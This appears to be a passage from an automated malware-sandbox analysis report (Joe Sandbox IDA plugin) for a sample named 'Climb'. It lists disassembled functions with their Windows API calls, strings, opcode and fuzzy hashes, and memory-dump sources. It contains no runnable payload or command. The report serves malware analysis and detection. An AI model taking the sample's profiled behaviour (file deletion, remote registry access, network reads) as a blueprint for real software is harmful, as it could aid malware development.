String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: c06acdb69f6abf70c267028b2eb0e59bbeb68c8599aed194c0d043f36614ac8e
Instruction ID: d4b7ded07cfe3ef49c6d1729c5b7a0576e9f0a2f61acf681ce632fd2a97b474d
Opcode Fuzzy Hash: c06acdb69f6abf70c267028b2eb0e59bbeb68c8599aed194c0d043f36614ac8e
Instruction Fuzzy Hash: C4E0863564162267D2512725AC08BDF65389F92B16B064216FC00E2200EB5CCC05C5F8

Function 00486607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,004C5657,?,?,004862FA,?,00000001,?,?,00000000), ref: 00486610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00486622
FreeLibrary.KERNEL32(00000000,?,?,004C5657,?,?,004862FA,?,00000001,?,?,00000000), ref: 00486635

Strings

Wow64RevertWow64FsRedirection, xrefs: 0048661C
kernel32.dll, xrefs: 00486609

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 2213318ced2b36eb331c406abf93f7652d62e09683c4c54ef4d5284f35003da7
Instruction ID: edf81c860aa237a4ecdc9a3bc3f577ddfa88e1c15f1fcf8d99fd7c137c48ff58
Opcode Fuzzy Hash: 2213318ced2b36eb331c406abf93f7652d62e09683c4c54ef4d5284f35003da7
Instruction Fuzzy Hash: 8BD01235652671679662372D6D18ACF6A25AEA1B1130A4816B804B2214EF6CCD06D6FC

Function 004F3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004F35C4
DeleteFileW.KERNEL32(?), ref: 004F3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004F365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004F366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004F367F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 4e5260127190c0a8b37a84f0d693790676b5e598b58b5d031bb2d2ca85c1a825
Instruction ID: 0d8c8ba8bde366d698409393d6b9a54e466b6fee3f3b5a03ec7cbe40be0ccda1
Opcode Fuzzy Hash: 4e5260127190c0a8b37a84f0d693790676b5e598b58b5d031bb2d2ca85c1a825
Instruction Fuzzy Hash: 96B16F71D0111DABDF11EFA5CC85EEEBB7DEF59304F0040ABF609E6141EA389A448B65

Function 0050ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0050AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0050AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0050AEC8
CloseHandle.KERNEL32(?), ref: 0050B09D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: ff9218bf73ea505b0eac1a9eb32d2854b9c49a06a292b3edce769a5e942ac05e
Instruction ID: ca2ebf0f91a4fbb694821e453621e48d62ffa8e9956f676e564e102e83046590
Opcode Fuzzy Hash: ff9218bf73ea505b0eac1a9eb32d2854b9c49a06a292b3edce769a5e942ac05e
Instruction Fuzzy Hash: C7A1BF71A00301AFE720EF25C886B2ABBE5AF44714F548C1EF5999B2D2DB75EC408B95

Function 0050C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 0050D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050C10E,?,?), ref: 0050D415
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D451
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4C8
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0050C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0050C5C3
RegCloseKey.ADVAPI32(?,?), ref: 0050C606
RegCloseKey.ADVAPI32(00000000), ref: 0050C613

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: f5da17c370643e414f5cb127a7ed40fece1252bd6c55daf4d92f1e18b20dc47a
Instruction ID: 165f745fa9fadc807df9e81e5cad7c31fb7efbaa4150d0c733f85541851b8108
Opcode Fuzzy Hash: f5da17c370643e414f5cb127a7ed40fece1252bd6c55daf4d92f1e18b20dc47a
Instruction Fuzzy Hash: 3D61A035208241AFC714DF14C894E6ABFE5FF85308F54899DF49A8B292DB31ED46CB91

Function 004EED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004ED7CD,?), ref: 004EE714

Part of subcall function 004EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004ED7CD,?), ref: 004EE72D

Part of subcall function 004EEAB0: GetFileAttributesW.KERNEL32(?,004ED840), ref: 004EEAB1

lstrcmpiW.KERNEL32(?,?), ref: 004EED8A
MoveFileW.KERNEL32(?,?), ref: 004EEDC3
_wcslen.LIBCMT ref: 004EEF02
_wcslen.LIBCMT ref: 004EEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004EEF67

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 1fdf806dfa045c4939be6c4a20bd06f8b442bbb07154cee071fc0dd35679ce54
Instruction ID: 110dc8ca4d4a228a15a06fbcb01a84e2bc0eae74b97a1bf9df1f6e4d38d955f8
Opcode Fuzzy Hash: 1fdf806dfa045c4939be6c4a20bd06f8b442bbb07154cee071fc0dd35679ce54
Instruction Fuzzy Hash: E05160B24083859BC724EB56CC819DBB3ECEF95305F40492FF689C3151EF79A688875A

Function 004E9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004E9534
VariantClear.OLEAUT32 ref: 004E95A5
VariantClear.OLEAUT32 ref: 004E9604
VariantClear.OLEAUT32(?), ref: 004E9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004E96A2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c321ffef5535d1ce8c8a363cc1ff2e277823ffb4ac07f2549751c963fbaea070
Instruction ID: aad8cb4bba0a6217b99e037b7023e406fd536dd382b84688f33e69d64af09867
Opcode Fuzzy Hash: c321ffef5535d1ce8c8a363cc1ff2e277823ffb4ac07f2549751c963fbaea070
Instruction Fuzzy Hash: 9D5168B5A00259EFCB10CF69C884EAAB7F8FF89310B05855AE909DB350E774E911CF94

Function 004F9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004F95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004F961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004F9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004F969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004F96A4

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 9c21914ab484429c7ad10d198a4303ef238635b7096c4aef81621c96d7008985
Instruction ID: 1b7117b8e5f5d3d73fc5be754c0ea68a7bed2611902fad91dec8e1201672ca84
Opcode Fuzzy Hash: 9c21914ab484429c7ad10d198a4303ef238635b7096c4aef81621c96d7008985
Instruction Fuzzy Hash: 28515D35A002199FDB05EF55C880AAEBBF5FF58318F048459E949AB362CB39ED41CB94

Function 00509941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 0050999D
GetProcAddress.KERNEL32(00000000,?), ref: 00509A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00509A49
GetProcAddress.KERNEL32(00000000,?), ref: 00509A8F
FreeLibrary.KERNEL32(00000000), ref: 00509AAF

Part of subcall function 0049F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004F1A02,?,7529E610), ref: 0049F9F1
Part of subcall function 0049F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004E0354,00000000,00000000,?,?,004F1A02,?,7529E610,?,004E0354), ref: 0049FA18

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: ca0d6d26e4c414dc8027297ff53d61c40dabc56d9c7843ae0ea246f2b7b59210
Instruction ID: caab53c2d3c29379afff207fec345633fb3b4962a632908a9c60ff18f2ec237d
Opcode Fuzzy Hash: ca0d6d26e4c414dc8027297ff53d61c40dabc56d9c7843ae0ea246f2b7b59210
Instruction Fuzzy Hash: 25514835600205EFCB01EF69C4859ADBBF0FF09318B1584A9E80A9B762D735ED86CF91

Function 005175AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 0051766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00517682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005176AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004FB5BE,00000000,00000000), ref: 005176D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005176FF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: db9f7201ec3fb5136ab202f8a486f2261f97460a25bfc67ea6e9c2a70e43464c
Instruction ID: 6eaf581aeb5558b333abc50f7c02f0c5a46a684ba4d3127531b79145638f7639
Opcode Fuzzy Hash: db9f7201ec3fb5136ab202f8a486f2261f97460a25bfc67ea6e9c2a70e43464c
Instruction Fuzzy Hash: 4F41BF35A08618AFE7259F2CCC88FE97FB5FB0A350F150264F819A72E0C770AD80DA50

Function 004B23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004B2433
_free.LIBCMT ref: 004B2453

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8c651e51dc0878cc33d504883e334263fbbc2200a113fd1494506aa396e06bbd
Instruction ID: ed381721bfe7690225269e39fd96854edfc7dbd23c3ea5bc1be3e9a8402136a3
Opcode Fuzzy Hash: 8c651e51dc0878cc33d504883e334263fbbc2200a113fd1494506aa396e06bbd
Instruction Fuzzy Hash: 9941E432A002109FCB20DF78C980A9EB3F5EF89314F1545AAE515EB351DB79AD01DBA4

Function 004E224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004E2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 004E230E
Sleep.KERNEL32(00000000,?,?,?), ref: 004E2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 004E2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004E232F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: c613fbb61f596093c126130fafb9d7612174434d4e61dfea9cd3f5d0e97066c0
Instruction ID: 5822e00fdc56f376f2c41e77293a5bea434181fb7c5729606e633f6c994702e5
Opcode Fuzzy Hash: c613fbb61f596093c126130fafb9d7612174434d4e61dfea9cd3f5d0e97066c0
Instruction Fuzzy Hash: CE31F671900259EFDB04CFA8CE89ADE3BB5EB14315F004256FA21EB2D0C3B49944DB64

Function 004FD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,004FCC63,00000000), ref: 004FD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 004FD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,004FCC63,00000000), ref: 004FD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,004FCC63,00000000), ref: 004FDA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,004FCC63,00000000), ref: 004FDA37

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 74cded094da3117a2ec3132aa74cb1fa02ae9d18da223e60285855f74fffbf45
Instruction ID: a5145024c3056bc881577e1884354af468b9fd78a9ca2fd4415033cd2953e675
Opcode Fuzzy Hash: 74cded094da3117a2ec3132aa74cb1fa02ae9d18da223e60285855f74fffbf45
Instruction Fuzzy Hash: FB319FB1900208EFDB20DFA6D884EBBB7F9EB14354B10842FE646D3240D778ED419B68

Function 005161A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 005161E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 0051623C
_wcslen.LIBCMT ref: 0051624E
_wcslen.LIBCMT ref: 00516259
SendMessageW.USER32(?,00001002,00000000,?), ref: 005162B5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: b999aea9b88956c3faed3dcc6b3f1402883c10aad628762e7eb4ff031d36ba75
Instruction ID: 78e2ae53365c6df6489875fefa15e073ff087347473b3f9d9b5b7bbbd28b9aa5
Opcode Fuzzy Hash: b999aea9b88956c3faed3dcc6b3f1402883c10aad628762e7eb4ff031d36ba75
Instruction Fuzzy Hash: 862173759002189AEB109F94CC84EEE7BB9FB55324F108616FA25EB180E77499C5DF50

Function 0050138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 005013AE
GetForegroundWindow.USER32 ref: 005013C5
GetDC.USER32(00000000), ref: 00501401
GetPixel.GDI32(00000000,?,00000003), ref: 0050140D
ReleaseDC.USER32(00000000,00000003), ref: 00501445

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f0565425745d240a3ebfa85e86019cc9afecdd466e7d299c9be8ab8873aded4f
Instruction ID: c1ece54944eb89727bc1111294b4568b2f1045d43788b953deadadb718da2045
Opcode Fuzzy Hash: f0565425745d240a3ebfa85e86019cc9afecdd466e7d299c9be8ab8873aded4f
Instruction Fuzzy Hash: 63218135600214AFD704EF66C894AAEBBF5EF58344B14886DE84A97751CB74AC04DBA4

Function 004BD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004BD146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BD169

Part of subcall function 004B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,004A6A79,?,0000015D,?,?,?,?,004A85B0,000000FF,00000000,?,?), ref: 004B3BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BD18F
_free.LIBCMT ref: 004BD1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BD1B1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e3d9a7cfed9077543f1f80f06af609b6fad8a2259c7411ee1794a69d374e1fe3
Instruction ID: 0f60cc49fef69b04bd30b1215d02da3644872dcbd27529f871972db53316b78f
Opcode Fuzzy Hash: e3d9a7cfed9077543f1f80f06af609b6fad8a2259c7411ee1794a69d374e1fe3
Instruction Fuzzy Hash: 9501B176A026157F23212ABA5C88CFB6A7DDED2B61314026AF804C2244EA688C0291B9

Function 004B316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,004AF64E,004A545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004B3170
_free.LIBCMT ref: 004B31A5
_free.LIBCMT ref: 004B31CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004B31D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004B31E2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b6fad7bfe2c7c24c257aff4a44f4dc0ca19654102d0e3f542f13db446a352e2d
Instruction ID: 655636a74c7b68d33f9f73fc1e3ec2ccc4802fc9b2459b51944a7ed62734a794
Opcode Fuzzy Hash: b6fad7bfe2c7c24c257aff4a44f4dc0ca19654102d0e3f542f13db446a352e2d
Instruction Fuzzy Hash: 230149763406103B82122F3F9C45EEB257CABD137B320092BFC2492281EE7D8A06613D

Function 004E08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

